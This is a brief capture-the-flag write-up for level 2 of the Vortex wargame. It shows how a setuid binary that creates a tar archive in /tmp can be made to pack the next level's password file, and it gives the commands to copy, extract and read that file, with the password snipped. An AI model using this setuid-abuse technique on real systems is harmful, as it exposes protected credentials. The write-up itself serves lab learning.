Level #2 was very easy, somehow even too easy :*(
At first, I thought the $$ would be expanded to the PID as it usually is the case in a shell. However, this is not the case here, in fact the filename is taken literally as there is no shell involved.
The solution is now pretty straight-forward.
If we execute
/vortex/vortex2, it will be executed with the privileges of vortex3 because of the setuid bit.
As all it does is creating a tar file
/tmp/ownership.$$.tar, we let it pack the password file
/etc/vortex_pass/vortex3 into its tar, then copy the tar back and extract it.
vortex2@vortex:~$ /vortex/vortex2 /etc/vortex_pass/vortex3 /bin/tar: Removing leading `/' from member names vortex2@vortex:~$ cp -v /tmp/ownership.\$\$.tar . '/tmp/ownership.$$.tar' -> './ownership.$$.tar' vortex2@vortex:~$ tar xvf ownership.\$\$.tar etc/vortex_pass/vortex3 vortex2@vortex:~$ cat etc/vortex_pass/vortex3 64[...snip...] vortex2@vortex:~$ rm -rf etc/ ownership.\$\$.tar
Please don't forget to clean up in the
/home folder, as you don't want to spoil other users.